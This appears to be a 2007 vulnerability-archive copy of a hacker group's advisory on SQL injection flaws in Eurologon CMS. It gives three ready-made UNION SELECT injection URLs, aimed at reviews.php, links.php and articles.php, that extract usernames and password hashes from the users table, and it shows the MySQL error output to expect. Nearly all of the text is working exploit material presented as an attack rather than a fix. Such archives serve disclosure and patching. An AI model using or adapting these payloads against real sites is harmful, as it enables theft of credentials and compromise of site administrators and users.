Lucene search
SecurityvulnsSECURITYVULNS:DOC:18524HistoryNov 29, 2007 - 12:00 a.m.
Eurologon CMS Multiple SQL Injection
2007-11-2900:00:00
vulners.com
40
/_ | ____ |\___ \ / | / |/ |
| |/ \ | | ( <_/ \ \ ______ | \ \
| | | \ | |/ \ \| | // | || |
||| /\| /____ /\___ >| ||||
\/\_____| \/ \/
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
Eurologon CMS Multiple SQL Injection
#By KiNgOfThEwOrLd
PoC
Uselessβ¦
Exploits
http://[target]/reviews.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
http://[target]/links.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
http://[target]/articles.php?id='+union+select+1,concat(username,0x3a,password)+from+users/*
Result
You will see the disclosed informations under some mysql errors like:
Can't execute query
[QUERY]
MySQL Error: The used SELECT statements have a different number of columns
Can't execute query
[QUERY]
MySQL Error: The used SELECT statements have a different number of columns
Can't execute query
[QUERY]
MySQL Error: The used SELECT statements have a different number of columns